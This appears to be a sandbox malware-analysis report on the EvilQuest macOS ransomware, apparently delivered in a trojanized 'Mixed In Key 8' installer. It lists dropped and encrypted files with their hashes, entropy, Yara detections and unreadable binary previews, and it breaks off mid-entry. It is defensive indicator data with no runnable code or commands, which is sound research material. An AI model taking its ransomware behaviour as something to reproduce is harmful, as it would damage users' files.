/Users/berri/.bash_sessions/.F01EAF3E-0906-4403-806A-CA639D38E2A8.historynew.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/.ncspot Download File
Process:	/Library/mixednkey/toolroomd
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	43
Entropy (8bit):	4.469999278451778
Encrypted:	false
SSDEEP:	3:WvWUJ2MV/S:Wv7J2U/S
MD5:	080BBB12B1ECBBC3683CBA062B9FAFC6
SHA1:	D80A2805B6CA46CCAA2239F4DFFD456226F28BD6
SHA-256:	8E71D208F88A887AAD1F0B3634CC8DF1855F9894242A820AF1684A9FE4B502DD
SHA-512:	4CE95FA55F48685E7D9504A6E8EEE687D37F967B991C1870E5F2527ABD0E087378C3E0F6C0363B6A2DFCFEE90E7B0C529443B47DA4767E45BCD5A50D6B2E2DE1
Malicious:	false
Preview:	34Zn3Q3dPXht1nK8vF2yRSsy3zEFYP1Nz\|3x0000043

/Users/berri/Library/.b0MbtGgfS Download File
Process:	/Library/mixednkey/toolroomd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	263769
Entropy (8bit):	5.904097615779343
Encrypted:	false
SSDEEP:	3072:UyDy05xe3ODm2wJyDy05xe3ODm2wJyDy05xe3ODm2wu:UtjZtjZtje
MD5:	662FEB869C2074ED79F5C53F071455A3
SHA1:	45EDE307F317E523C591F310B87DEA13D1DBB1F6
SHA-256:	AA9C64BB05DA68BFF26A47040025911C963A5B00E414E4326ED55E407812FFE2
SHA-512:	9B064030A96056BE5184728A9E0EC54F2995D8577C05A1B258385780BC66B6FCAF16D1DA664842422DF2DF59B2BFA11EBABBA5695A6B6DADCA51B2E139B39D40
Malicious:	true
Yara Hits:	Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Users/berri/Library/.b0MbtGgfS, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Mixed In Key 8.dmg, Detection: malicious, Browse
Preview:	.......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........

/Users/berri/Library/Accounts/.Accounts4.sqlite-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.4039195132211795
Encrypted:	false
SSDEEP:	24:62fFwzLVJLlXN0000000000000N000000000000000000000000000000N00000a:6Y8LlX3uGNpq
MD5:	7C97A558EA70863352358A8032F1B189
SHA1:	5792E17287990F724F379AC405B1786CB9B5C04A
SHA-256:	2676BF4DEACA48E6642790261F49F4ED726B3883075D9743131A447FDAE9BEA8
SHA-512:	94D7617A4C0B86037ABFAE55BDB1C854F01FF35B3FD78B003D45F6339320C9E55010A7A71A6E3082166DF6DBEBD5F13CC424F5003ACC66BE3A0F9B95C3E2B2B3
Malicious:	false
Preview:	f...#D.........B0v.w3z(..a.6.z.<NZ..lc.(8..u.H.f...#D.........B0v.w3z(..>......NZ..lc.(8..u.H.6<.."a...;g.fU.....q.A"&6<.."a...pZ\|.....+.......7.z?.<..Yv.m........L,._e...Jm.....?.FuS.P..4.W..`'m.42.L..5.O....6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Accounts/.Accounts4.sqlite-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	78662
Entropy (8bit):	5.586869244606422
Encrypted:	false
SSDEEP:	384:0we8GvLffjbZozHtMFNSWaLz2lVIJKNVwpXvbMtr6N8IBk9cialYpd5xLgrH5LK/:1e8off/Zo7tMCL2VVeik8HfpkLlEr
MD5:	70F99645149AA921468AEBEBDB1AD926
SHA1:	609263751850E926CDA16ADB96B069444B6D9D91
SHA-256:	1BF543C31D4207EA903E6CFE382435E5C22D873E425C578AB8D06420B0F53F0E
SHA-512:	8427857CE79C2A1D7E2B2ED605CC89150BBE2BC8F937820E4F9242A49151E6415FF718A5A5E10B5FB0B584D0040217B970EEC3D71013B879ECEE71E480F356A2
Malicious:	false
Preview:	^u..o.F.47.W&.z.NZ..lc.(>P;..3...Dy.E.NZ..lc.(/.E.~.@...6J......p..v.....}..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Accounts/.Accounts4.sqlite.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	143746
Entropy (8bit):	4.483422286624289
Encrypted:	false
SSDEEP:	384:9CUfjWMOfO7O04O/KVv7tFXFFQUfnUH7h7NP/E+xa:9CUbWMOfO7O04O67tVFFQUod7B/c
MD5:	248549031D879753B38D2EA9C375112D
SHA1:	E84243C45CB8965A98422F12F9C15E07E5550DDC
SHA-256:	6E09D6A767CA0F20DD79EAE04B903B14FEC383590AA09B05E2B75B61E1D75F40
SHA-512:	C414A7AE7ADFA3F76B60F1FB0B3289DC90446290778189F3D0748D6CD37B586CB27FE27C8D7DDF8B9305078DD4FA329E13ABE81635E62D8F9E6B5EDB02DEBF6F
Malicious:	false
Preview:	..d.=..._t.........X....gm{.656<.."a....$.v.........`..7...x..7...xt....Sq6<.."a...2.I6.1.d.hk...9U.._........\_..'L$.^eSH~._..3A..g.....$..q..V.&.....].p.[W/..a/.j...g........z?.S.v..;.k...?.$H..,.S.......2...-..V-.D..N...e.E9e....#k{X.=....$l.8.%......C..U6i,.j.:.Pyr....X.;..S...N....RK.2...-..V-.D..N.w.x...ObT....Q..g........G..S.Y.9-.&c..6O...)j-.E.s.3].N...w.....{..4.q...^.;i.I..W.....w(....t..b.Qa....g&..e.....pH.M%..IRX....+.'...\|+.=...g.,t...,.hU5..+.<^.sl..3..c.....%E..!.N.k..Z....`........c..;...x...[ .-e....#k{.m.o........#...zx....7..E1.r}._...n......5...T.k.>.,b..[#.dx].DX.HZ...Z..LG".<uv........c..x...."K...%..O.U...q....@.o..h....x.....0r.r.'.Y?1..!.....Q..........<.&..u...u......J.Dy..Lm.xdq.....q....@.o..h...K9..O8.".).ro..Z..LG"...s... g....r..I..w3.G....t..)(..Y)........u....)..]-.......f..%IB..v7..........O.7.?.\.P.eL..e.s.........m.....*..W.v....>......:...O.q.Yh...=.V'(O4.o._.../r....@............d.dgH....<F.U

/Users/berri/Library/AppQuest/com.apple.questd Download File
Process:	/Library/AppQuest/com.apple.questd
File Type:	Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS\|DYLDLINK\|TWOLEVEL\|PIE>
Category:	dropped
Size (bytes):	175849
Entropy (8bit):	5.9041399023174925
Encrypted:	false
SSDEEP:	1536:Za1y6Wy05/WQe3BIDmMVj5Snfn4+2a1y6Wy05/WQe3BIDmMVj5Snfn4+u:UyDy05xe3ODm2wJyDy05xe3ODm2wu
MD5:	A1D2D830FAD633638B0F6B20EF20A74B
SHA1:	11E526E23238A274B66B68F97F0F6F02168B8B98
SHA-256:	F2E59188AFC0FF0F82FAA8771CF89CF0D08023B0E289547C9BF48909F28FF03C
SHA-512:	8641E5AC3DDBFECC6035A4DBF29EB7EDE64076F5BAA32497AEEE10E5638A5749F8E6B7C54CD709D95F8DA806C9C5F003E09220ECD4E441B0CAA5942550391BA6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Users/berri/Library/AppQuest/com.apple.questd, Author: Joe Security Rule: JoeSecurity_EvilQuest, Description: Yara detected EvilQuest Ransomware, Source: /Users/berri/Library/AppQuest/com.apple.questd, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Joe Sandbox View:	Filename: Mixed In Key 8.dmg, Detection: malicious, Browse
Preview:	.......................... .........H...__PAGEZERO..........................................................(...__TEXT...................0...............0......................__text..........__TEXT.......... ............... ...............................__stubs.........__TEXT..........................................................__stub_helper...__TEXT..........................................................__const.........__TEXT..........................................................__cstring.......__TEXT...................*......................................__unwind_info...__TEXT.........../......H......../..................................x...__DATA...........0...............0..............................__nl_symbol_ptr.__DATA...........0...............0..................Z...........__got...........__DATA...........0......(........0..................[...........__la_symbol_ptr.__DATA..........00..............00..................`...........__const.........__DATA..........

/Users/berri/Library/Application Support/CallHistoryDB/.com.apple.callhistory.databaseInfo.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	554
Entropy (8bit):	6.217546399426737
Encrypted:	false
SSDEEP:	12:A57dZq6tBDjmeYqF976vO6kui/OsewLYTc+qGm7:Al7q6/DjmeX9+vLyOsePc0m7
MD5:	C9F6751200484EC4CA62F632F1E977AE
SHA1:	4E99A662A1F422CB7525570B313B200EED388884
SHA-256:	4084B4ACE329784CEBAC6B33EB488087BEC81979DF4980CE3DCD941DDB6CAF55
SHA-512:	270CEFDAFA0309B9898C6971BB5DBC83199AA607B9E4F26282F4C1D5DF66F0E2EFA79988D3D588B4ADCF6843CB57AA15D9416272AFB7B91FB7CC316A7D5253B0
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C.c..;.4............M._K.....w).~.\....Uu..)....!.)..Ji.....,...A....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Application Support/Microsoft AU Daemon/.FirstStartTime.dat.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.033377976575007
Encrypted:	false
SSDEEP:	3:nSYzu4/IRAnyLJR1tXSG3YktElHlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalv:JnYhel8BzsewLYHEec/LaqG8rQQwiQ/6
MD5:	C60D2B1E615CC3A8DF429DF50834C1FE
SHA1:	9878FA92B63269118B9A72901FED742043BA5051
SHA-256:	2892CE07C7A91CE5DDD2DE04BCD4D59DBDCBC3B650E3487338309380E7F6A3EE
SHA-512:	E9FEE9128B8571B4041373C9EADC197C82C928C8737810CEA58D70FFF9C207198CD61B0DBA60A71FFBE71C03D11B52013AC15DBDA059FEE3D8B2473B249F66B5
Malicious:	false
Preview:	..`..I.N/y.....A...L....a.%@.`....W...R..Y..0.._.QH...w.v.Hs..<....w..I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Application Support/OneDriveStandaloneUpdater/.FirstStartTime.dat.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.118699869803379
Encrypted:	false
SSDEEP:	6:+4f1IQQkzsY7wRl8BzsewLYHEec/LaqG8rQQwiQ/6:+4NQknwRWsewLYTc+qGm7
MD5:	75A6F570435EAEBE394152B73E6A00F3
SHA1:	888266B023DED30BB9CCCD5F278CA873AE675DC9
SHA-256:	11FF8DACD661C23A11D8945B7214FA0953420678D0A854172089A9E92FB58C5B
SHA-512:	DC01B8169ED81F851B9D2EE743C863710066019576DE17D03D927613AE0CF2826AE4F5D39430009227BE751EBCC8597AF78A098DE5BA3611C6171D15F45DDFC1
Malicious:	false
Preview:	..N...B...\>i..rKA..:...H\|1AE.>!....4&...a^..FWD.......~.,.S...<....w..I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Application Support/com.apple.spotlight/CandidateReports/com.apple.Spotlight/.com.apple.Spotlight-2020-11-26.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	54981
Entropy (8bit):	7.957759506214706
Encrypted:	false
SSDEEP:	768:QMHOtEOYOlis5GsLcYS8Pr1ksU7wYSW0A5vEZuAAIG2F5vD7czZhoBrHQCKhlZ:Ql63O4s5G9IPtskuAAIGmsNhMjRKhz
MD5:	A0F081F9DA1827F950F6F3BF03647959
SHA1:	42022912C7A24C9DEC5298981BFC5B4C33B8522D
SHA-256:	002F75A05D901838FAF33E857B12B38761D69A0F1B32F714C6961C79D0BCC3FE
SHA-512:	4EFCCA8C5EF5D87396625A32E8148ADAB4C83A5A47093F79534771E6EEB1823569204451417DB47D73C6DA57FC38E14FCB1138468A099FC54C644BF02E164A20
Malicious:	false
Preview:	<...].......ns.....&.z=..'GQ.Hjd...D..rfwL.B.px.6...%r..p.F.2..[.H.....3....b..?z.a3{......3.de.W9..P.0.t......>!.l..\|UN...'.iUi........!l..Lz<...Jg...<>QZ.0...o....F..~..CT......&.#.......?H.M.!G.{...Et.b.lA.Q;e.0S.^..)A.......7...ZCF{C]....w...#T.y5....~.C"B.4...R.rJR...f..._E.c...@[....Y..p.QE<..8...@.g.<keU.mt...??.~i..f..F#..4..B.rQ..(q,.>pY"m.P.0.t......>!.lpGw.s)w.Q..oP...S.......V.K.B.C>._R..$v;g.....>!.l .....xo...#T.y55N.{....=_.+.>.-..y.w..s....p....@...".I`.$.`... ....\....Y#....:D.7.`lq.m3....2p].z]..........X...b......-]............G@.gx..........l.m.....S.{.6......m.....80.l.7...-........>P.....>H-L.nX...j...O.I....c.<S.]&.k..9m...N%.;...s.@..........t.{.i!.(...F.M.`..5...B[....1....M...4...(U.^.z...N........)..tB.).....C.........,..N...>........7.2...I.V..4.<.?.......d..(..7...u....U..=...z.AY_...#.......p.5..w....Vo.,tX....J.......&....u..g.fI..S.%.f.......R.X.....v1.&..w.3.....Y..:....$...>I^..;

/Users/berri/Library/Application Support/com.apple.spotlight/CandidateReports/com.apple.Spotlight/.com.apple.Spotlight-2020-11-30.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	63325
Entropy (8bit):	7.958175844089441
Encrypted:	false
SSDEEP:	768:QMHOtEOYmlis5GsLcY68Pr1ksU7wYSW0A5vEZu+AIG2F5vD7czZhoBrHQrKhlmVJ:Ql63m4s5G94Ptsku+AIGmsNhMj0KhA/
MD5:	9D10890E70FB00D4F91981CEACF3272C
SHA1:	8C8FF0996AB6C86563FB8241B4AC8DFBEFED55B4
SHA-256:	D2A8BEFA3E888D92CC4F97B7515A1558378AAC8F9D2816A552B943A2DADEEE10
SHA-512:	145CA61EF2F9AAF50D18313ADE306F2B1CB2324ABD9F983520CD747FE59C02BEA4A796BCA29B9EBA947A9F48A2BAE6115D99AEA0A1C53AEC762B96BD30B80466
Malicious:	false
Preview:	<...].......ns.....&.z=..'GQ.Hjd...D..rfwL.B.px.6...%r..p.F.2..[.H.....3....b..?z.a3{......3.de.W9..P.0.t......>!.l..\|UN...'.iUi........!l..Lz<...Jg...<>QZ.0...o....F..~..CT......&.#.......?H.M.!G.{...Et.b.lA.Q;e.0S.^..)A.......7...ZCF{C]....w...#T.y5....~.C"B.4...R.rJR...f..._E.c...@[....Y..p.QE<..8...@.g.<keU.mt...??.~i..f..F#..4..B.rQ..(q,.>pY"m.P.0.t......>!.lpGw.s)w.Q..oP...S.......V.K.B.C>._R..$v;g.....>!.l .....xo...#T.y55N.{....=_.+.>.-..y.w..s....p....@...".I`.$.`... ....\....Y#....:D.7.`lq.m3....2p].z]..........X...b......-]............G@.gx..........l.m.....S.{.6......m.....80.l.7...-........>P.....>H-L.nX...j...O.I....c.<S.]&.k..9m...N%.;...s.@..........t.{.i!.(...F.M.`..5...B[....1....M...4...(U.^.z...N........)..tB.).....C.........,..N...>........7.2...I.V..4.<.?.......d..(..7...u....U..=...z.AY_...#.......p.5..w....Vo.,tX....J.......&....u..g.fI..S.%.f.......R.X.....v1.&..w.3.....Y..:....$...>I^..;

/Users/berri/Library/Application Support/com.microsoft.OneDriveStandaloneUpdater/com.microsoft.HockeyApp/MetaData/.metadata.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	938
Entropy (8bit):	7.044750131230123
Encrypted:	false
SSDEEP:	24:U+bGyd+7ViShwJ3aDfYqSOYFBApbzGBsePc0m7:BLkZiSSJaTXb4Npq
MD5:	7D6931CB22AB4E5D5D671F37A47B21EB
SHA1:	7322A658B3B188FC67F1D6149A25B4840BC89E6A
SHA-256:	E20B4BD7871A91DAA4ADD3C63B96A996B3284DAA64BF203469E74A583ADD4859
SHA-512:	E948C2612400890E6141108E8FB434F665EF4CC8840B474D5F24A5C9A987A2E16C60FF51CDA9D214EE1D434AF2C65FFCACFCD4E905374960FB74E901FC854D91
Malicious:	false
Preview:	...a>k...i...1.)...A..zQzN\|...F...=.... ht..8....$..[.4.M....o.6......#..,w\..Q...\#...4-..=...x..L.[......t4..J,.~.<.....P2..\|O...<#i ....%..D.`h3{...d.z$..7..`....F...a...]..8....R.....;.......&..7.m..$.\...H..{..;...N...z......I>pY.t.2..{f.w0[..x......B...QE..{Kcd..Fye...%P.1..?.%....>...[..-/.H...v.....@s.I..Be.....K<.:.....e..U}..n.-..O.#.'M.....]..=.\|Kw.sa..{...<... ......h'.F1..;(...~.S<..g..%..$...N\|.../....T............&.. @'....^.....>....7..]...v'....-).1w.:.H......[....-......".u..\|.Z.}.D..h.......2.JGc.F.......\|.1R.n`...4\|i....BB.,.L..H.ss..>.;./..$.Ij..q.KhY...6<.."a..x.._....y.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.311007485153375
Encrypted:	false
SSDEEP:	24:Wa00RVaNgwQ0000000000000000000000000N00000000000000000000000000/:t7NHNpq
MD5:	2E8271BF8F55C068ACDF363AC9AF4874
SHA1:	293A5F246B5CA66204CB8D3B601A6DC768550146
SHA-256:	033E228ECBAB1C6848EF974889A2EE3A9697BBB986D31E52745EE3CF3CE242A7
SHA-512:	962ABDA0597A71F6BFE9B78ECE231EA34A26F68ACD9FEB161797362030FA5C15EFF5703946F529C56E769C7CDBAB83D7DB21A51D3BDC41D7ACF71D5C728837CF
Malicious:	false
Preview:	f...#D...z.Ydf].6<.."a..6<.."a..6<.."a........&f...#D...z.Ydf].6<.."a..t....Sq6<.."a........&6<.."a.....q.A"&...q.A"&6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Application Support/videosubscriptionsd/.VSSubscriptions.sqlite.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	74078
Entropy (8bit):	4.30338969528054
Encrypted:	false
SSDEEP:	192:M+T9Y4Y1DB92C+fZJQtZpw24QMKKQYDGPpnOtr6amUzUs:MOibICUC4XKKTGPpOtrxlIs
MD5:	DAE8CD3B0AB97AC4ED2573E1A63975B7
SHA1:	795CC6F93A2EEA0C0BA06ED8611FAD348CFF0E9C
SHA-256:	C0577F41C6AAE0A1BA375A599D32B7F45D8B3BA3A0DBFCB981322060281177CB
SHA-512:	C0D11DDDFD24790ABF56099A906FEFE5A84BA2612618617CDBE3DE6F063CCF34B4052B280EBEBCAE3E725EF0EDEA2E99AFB2062C2744802D47B58951B0335B45
Malicious:	false
Preview:	..d.=..._t.........X...c....f6<.."a.....>.8....io'...7...x..7...xt....Sq6<.."a...2.I6.1........Ep...;D..........&.{....U..V\h...l.GQ6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	10306
Entropy (8bit):	7.958726374599179
Encrypted:	false
SSDEEP:	192:JRh/jjCdOV097Hfm1/X6/5APiDP4rj1VikPEos+MFCTK97v7Y2+ATxnj4sLtMj:blf509jm1/XA5A4yj1okP++ZIrdHLy
MD5:	59CABBECE3011B3F33485223C1C0A870
SHA1:	7662C1F586CAADF3937F6BA3F6EFA2F62E682FE7
SHA-256:	5C7E6FC08161DF3F2E3B05A96995F95DA87923A411D795EDB9A210CD4D806611
SHA-512:	4F8E0A36D70841B15EE40CB5DE658FBE97773D745B8571CE4BE5E14928D559B5D89051E47C26569FB342D524716DA4DCCF46646184062DC47D487083E09341B6
Malicious:	false
Preview:	.<.\|.....f.A..>..D....2.....(d....&.f.;......$1..@Y.i .Y.a..v..h.>/.KR0..Pt.....?.N..x~.S..........Q.Q..C<@...[2(s..JE........[..st........c....v[...jF..........+.')nO.c.OhH...).IX..#A.e.'.7/x%....Q....A.(..m.........DC..f.B.[..].....#Rh.~....B.oY..C._#!w-..7I..V...Um].W.G....Db.G.........a<.S..+.5Y..E.....E.Q.g......'\..~....Z.Xn...}UYN..~@Bw(}.q.......\....-./[..u...h;.~..;.,.D....-.7.!$.....h...r.Vc....Bys$.,.$.Z".....1.c..W.^c.`s.........u......2T..Q"B....J......_l_.p`..8....C.d..{..X.T..'..\|..th..!..V..{......9a..Qp`..-......V.._.T....>...H...!..f.z..a..V;..I.W.B0..;`.Qc.g..y...;...2}..QUNB......~.8.4K.ji.`../&....uz..Fo.w/;...3e..Z.<r#.F....e.$,.....fm...C.,..DBQ..U[?u..[.......;.....8.a....Q....VHC%kr..E.s_.....Z]^..:..%...Ue.+:..Ca=...S............Z=.....IV.5...'........+..^...co...j%.c..7qM.Dr..N.........o2p6C...`nm.vb'....=.nO0x.i..&5.u.T..K..d./.Q.u.."..-\|Z.e...w>+.I`..7.t`1@.{.uW.j...M..r.*.^b'..O.l..j.+T...../.... KuT.

/Users/berri/Library/Caches/GeoServices/Resources/.DetailedLandCoverPavedArea-1@2x.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	73238
Entropy (8bit):	7.996907389548867
Encrypted:	true
